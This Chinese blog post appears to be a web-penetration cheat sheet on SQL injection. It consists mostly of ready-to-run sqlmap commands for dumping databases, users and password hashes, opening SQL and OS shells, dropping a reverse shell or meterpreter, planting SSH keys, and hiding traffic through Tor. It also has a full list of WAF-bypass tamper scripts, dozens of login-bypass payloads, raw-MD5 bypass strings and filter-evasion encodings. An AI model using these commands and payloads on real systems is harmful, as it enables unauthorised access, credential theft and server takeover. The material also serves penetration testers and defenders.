首页 > 数据库 >WEB渗透Web突破篇-SQL注入(SQLMAP)

WEB渗透Web突破篇-SQL注入(SQLMAP)

时间:2024-07-31 12:25:04浏览次数:11  
标签:SQLMAP WEB Web -- py 替换 admin 字符 id

WEB渗透Web突破篇-SQL注入(数据库判断)-CSDN博客

WEB渗透Web突破篇-SQL注入(MYSQL)-CSDN博客

WEB渗透Web突破篇-SQL注入(MSSQL)-CSDN博客

WEB渗透Web突破篇-SQL注入(Oracle)-CSDN博客

WEB渗透Web突破篇-SQL注入(PostgreSQL)-CSDN博客

WEB渗透Web突破篇-SQL注入(SQLite)-CSDN博客

WEB渗透Web突破篇-SQL注入(DB2)-CSDN博客

WEB渗透Web突破篇-SQL注入(SQLMAP)-CSDN博客

使用
sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
-p 指定注入点,注入参数
--user-agent 指定user-agent
--random-agent 随机user-agent
--threads 线程
--risk 风险等级 随着等级的增多,增加格式的测试语句
--level 随着level变多,payload增加,运行时间增加,还会测试请求头的注入
--eta 显示每个输出的预计完成时间
--dbms 指定当前数据库类型
--os 指定系统版本
--banner 获取数据库管理系统的标识
--is-dba 测试是否为dba权限
--dbs 列出全部数据库
--current-user 列出当前用户
加载请求文件使用手机useragent
sqlmap -r sqli.req --safe-url=http://10.10.10.10/ --mobile --safe-freq=1
自定义注入点UserAgent/Header/Referer/Cookie
用*号指定注入点
python sqlmap.py -u "http://example.com" --data "username=admin&password=pass"  --headers="x-forwarded-for:127.0.0.1*"
二阶注入
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
shell
SQL Shell
python sqlmap.py -u "http://example.com/?id=1"  -p id --sql-shell

Simple Shell
python sqlmap.py -u "http://example.com/?id=1"  -p id --os-shell

Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1"  -p id --os-pwn

SSH Shell by dropping an SSH key
python sqlmap.py -u "http://example.com/?id=1" -p id --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/
使用 SQLmap 自动爬取网站和利用
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms
将 TOR 与 SQLmap 一起使用
sqlmap -u "http://www.target.com" --tor --tor-type=SOCKS5 --time-sec 11 --check-tor --level=5 --risk=3 --threads=5
代理
sqlmap -u "http://www.target.com" --proxy="http://127.0.0.1:8080"
使用cookie 和代理
sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/cookie.txt --proxy "http://127.0.0.1:8080"  -f  --time-sec 15 --level 3
使用后缀篡改注入
python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "
使用tamper bypass waf
Tamper描述
0x2char.py用CONCAT(CHAR(),…) 替换每个 (MySQL) 0x<hex> 编码字符串
apostrophemask.py用utf8代替引号
apostrophenullencode.py绕过过滤双引号,替换字符和双引号
appendnullbyte.py在有效负荷结束位置加载零字节字符编码
base64encode.pyBase64编码
between.py用between替换大于号(>)
bluecoat.py代替空格字符后与一个有效的随机空白字符的SQL语句 然后替换=为like
chardoubleencode.py双url编码(不处理已编码的)
charencode.pyurl编码
charunicodeencode.py字符串 unicode 编码
charunicodeescape.pyunicode 转义
commalesslimit.py无逗号
commalessmid.py'MID(A, B, C)' 替换为 'MID(A FROM B FOR C)'
commentbeforeparentheses.py括号前的注释 ( -> / **/()
concat2concatws.py'CONCAT(A, B)' 替换为 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'
charencode.py字符编码
charunicodeencode.pyunicode 编码
equaltolike.py替换等号为like
escapequotes.py转义引号
greatest.py用GREATEST替换大于号
halfversionedmorekeywords.py关键字前加注释
htmlencode.pyHTML 编码
ifnull2casewhenisnull.py将 'IFNULL(A, B)' 之类的实例替换为 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END'
ifnull2ifisnull.py用 'IF(ISNULL(A), B, A)' 替换像 'IFNULL(A, B)' 这样的实例
informationschemacomment.py在(MySQL)“information_schema”标识符的所有出现的末尾添加一个内联注释(/ **/)
least.py将大于运算符 ('>') 替换为 'LEAST' 对应项
lowercase.py用小写值替换每个关键字字符(例如 SELECT -> select)
modsecurityversioned.py包含带有版本化注释的完整查询
modsecurityzeroversioned.py包含带有零版本注释的完整查询
multiplespaces.py在 SQL 关键字周围添加多个空格
nonrecursivereplacement.py双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、”")) filters
overlongutf8.py转换给定有效负载中的所有字符
overlongutf8more.py将给定负载中的所有字符转换为超长 UTF8(例如 SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94)
percentage.py在每个字符前面添加一个百分号 ('%')
plus2concat.py将加号运算符 ('+') 替换为 (MsSQL) 函数 CONCAT() 对应项
plus2fnconcat.py将加号运算符 ('+') 替换为 (MsSQL) ODBC 函数 {fn CONCAT()} 对应项
randomcase.py用随机大小写值替换每个关键字字符
randomcomments.py为 SQL 关键字添加随机注释
securesphere.py附加特殊制作的字符串
sp_password.py将“sp_password”附加到有效负载的末尾,以便从 DBMS 日志中自动混淆
space2comment.py用注释替换空格字符 (' ')
space2dash.py用破折号注释 ('--') 后跟随机字符串和换行符 ('\n') 替换空格字符 ('')
space2hash.py将空格字符 (' ') 替换为井号字符 ('#'),后跟随机字符串和换行符 ('\n')
space2morehash.py将空格字符 (' ') 替换为井号字符 ('#'),后跟随机字符串和换行符 ('\n')
space2mssqlblank.py用一组有效替代字符中的随机空白字符替换空格字符 (' ')
space2mssqlhash.py用井号字符 ('#') 后跟换行符 ('\n') 替换空格字符 ('')
space2mysqlblank.py用一组有效替代字符中的随机空白字符替换空格字符 (' ')
space2mysqldash.py用破折号注释 ('--') 后跟换行符 ('\n') 替换空格字符 ('')
space2plus.py将空格字符 (' ') 替换为加号 ('+')
space2randomblank.py用一组有效替代字符中的随机空白字符替换空格字符 (' ')
symboliclogical.py将 AND 和 OR 逻辑运算符替换为对应的符号(&& 和
unionalltounion.py将 UNION ALL SELECT 替换为 UNION SELECT
unmagicquotes.py将引号字符 (') 替换为多字节组合 %bf%27 以及末尾的通用注释
uppercase.py用大写值“INSERT”替换每个关键字字符
varnish.py附加 HTTP 标头“X-originating-IP”
versionedkeywords.py用版本化 MySQL 注释将每个非函数关键字括起来
versionedmorekeywords.py用版本化的 MySQL 注释将每个关键字括起来
xforwardedfor.py附加一个虚假的 HTTP 标头“X-Forwarded-For”
使用账户密码访问数据库
sqlmap.py -d "mysql://user:pass@ip/database" --dump-all
身份验证绕过 - 万能账户密码
'-'
' '
'&'
'^'
'*'
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
'--'
"--"
'--' / "--"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' -- -
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin';-- azer 
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
身份验证绕过(原始 MD5 SHA1)
当密码为MD5加密是
查询语句是这样的
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
绕过方式
md5("ffifdyop", true) = 'or'6�]��!r,��b�
sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-!
WAF 绕过
无空格
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--
注释符
?id=1/*comment*/and/**/1=1/**/--
括号绕过
?id=(1)and(1)=(1)--
更多
DBMSASCII characters in hexadicimal
SQLite30A, 0D, 0C, 09, 20
MySQL 509, 0A, 0B, 0C, 0D, A0, 20
MySQL 301, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0
PostgreSQL0A, 0D, 0C, 09, 20
Oracle 11g00, 0A, 0D, 0C, 09, 20
MSSQL01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20
无逗号
LIMIT 0,1         -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4    -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
无等号
?id=1 and substring(version(),1,1)like(5)
?id=1 and substring(version(),1,1)not in(4,3)
?id=1 and substring(version(),1,1)in(4,3)
?id=1 and substring(version(),1,1) between 3 and 4
大小写
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
运算符
AND   -> &&
OR    -> ||
=     -> LIKE,REGEXP, BETWEEN, not < and not >
> X   -> not between 0 and X
WHERE -> HAVING

标签:SQLMAP,WEB,Web,--,py,替换,admin,字符,id
From: https://blog.csdn.net/qq_59468567/article/details/140819367

相关文章

  • test 2D渲染器 WebGL WebGL2
    1import{Box,Matrix3,Vector2}from'./Utils.js';2import{Shape,ShapeUtils,SplineCurve}from'./TwoUtils.js';34constBlendEquationAdd=[0,-1];56constBlendDefault=[6,7,-1,-1],7BlendAdd=......
  • hackme,aiweb,tomato靶机解析大礼包
    注:所有靶机均只做到连接木马,并未提权寻找flag,问就是不会o(╥﹏╥)ohackme靶机1.导入靶机,查看其网段,使用端口扫描工具(御剑2014)进行扫描,获取端口后进入2.注册一个账户登录3.随机输入,点击search,抓包,在搜索框后加*,使用sqlmap注入4.获取数据库,表,数据5.......
  • NSSCTF web入门题鉴赏
    前言思来想去还是觉得web好玩一点哈哈,尝试过crypto更能懂那种痛楚[SWPUCTF2021新生赛]Do_you_know_httphttps://www.nssctf.cn/problem/385这道题就是简单的http协议刚开始是'WLLM'browser!这个题眼,于是我们上网络查询一下,发现useragency并不是它,那就需要我们去改一下us......
  • 【Websim.ai】一句话让AI帮你生成一个网页
    【Websim.ai】一句话让AI帮你生成一个网页网站链接websim.ai简介websim.ai接入了ClaudeSonnet3.5,GPT-4o等常用的LLM,只需要在websim.ai的官网指令栏中编写相关指令,有点类似大模型的Prompt,指令的好坏决定了网页生成的质量。生成的网页可以有很多用途,比如说生成游戏:俄......
  • 部署 Blender 脚本以用作 Web 服务器上的 api
    我在Nextjs中有一个网站和一个混合器脚本,它获取图像、纹理图像并将它们合并在一起,同时应用一些视觉效果(如深度)、渲染结果并将渲染结果的png图像返回到前端以供使用网站中的img标签。我制作了一个pythonFlask应用程序,安装了搅拌机,并制定了将搅拌机作为子进程运行的路线,......
  • javaweb面向切面aop编程-实现自定义填充
    实现自定义填充注解@AutoFill创建annotation包,编写注解类点击查看代码/***自定义注解,用于标识某个方法需要进行功能字段自动填充处理*/@Target(ElementType.METHOD)@Retention(RetentionPolicy.RUNTIME)public@interfaceAutoFill{//数据库操作类型:UPDATEINSE......
  • Web 安全:Memcached 未授权访问漏洞.(11211端口)
    Web安全:Memcached未授权访问漏洞Memcached是一套常用的key-value缓存系统,由于它本身没有权限控制模块,所以对公网开放的Memcache服务很容易被攻击者扫描发现。然而Memcached的默认配置,11211端口 不需要密码即可访问,可以直接连接到Memcached服务的11211端口获取......
  • 了解Web标准,HTML 语法规范,使用 HBuilder X 构建文档骨架,HBuilder X 生成骨架标签新增
    Web标准是由W3C组织和其他标准化组织制定的一系列标准的集合。W3C(万维网联盟)是国际最著名的标准化组织。遵循Web标准可以让不同的开发人员写出的页面更标准、更统一外,还有以下优点:1.让Web的发展前景更广阔。2.内容能被更广泛的设备访问。3.更容易被搜寻引擎搜索。......
  • WebSocket 的产生
    HTTP不断轮询怎么样才能在用户不做任何操作的情况下,网页能收到消息并发生变更。最常见的解决方案是,网页的前端代码里不断定时发HTTP请求到服务器,服务器收到请求后给客户端响应消息。这种方式的应用场景很多,例如扫码登录,前端网页不知道用户是否扫描,只能不断询问后端服务器。......
  • CTFshow web入门vip 文件上传
    web151题目提示前端校验不可靠,看源码可以看到是传到upload.php这个文件去接受文件上传,文件类型为图片,后缀限制为png然后把前端验证修改一下,把文件后缀限制改成php写个一句话木马传进去1.php<?phpeval($_POST['x']);?>url中需要加入我们传入文件的目录/upload.php,并指定/......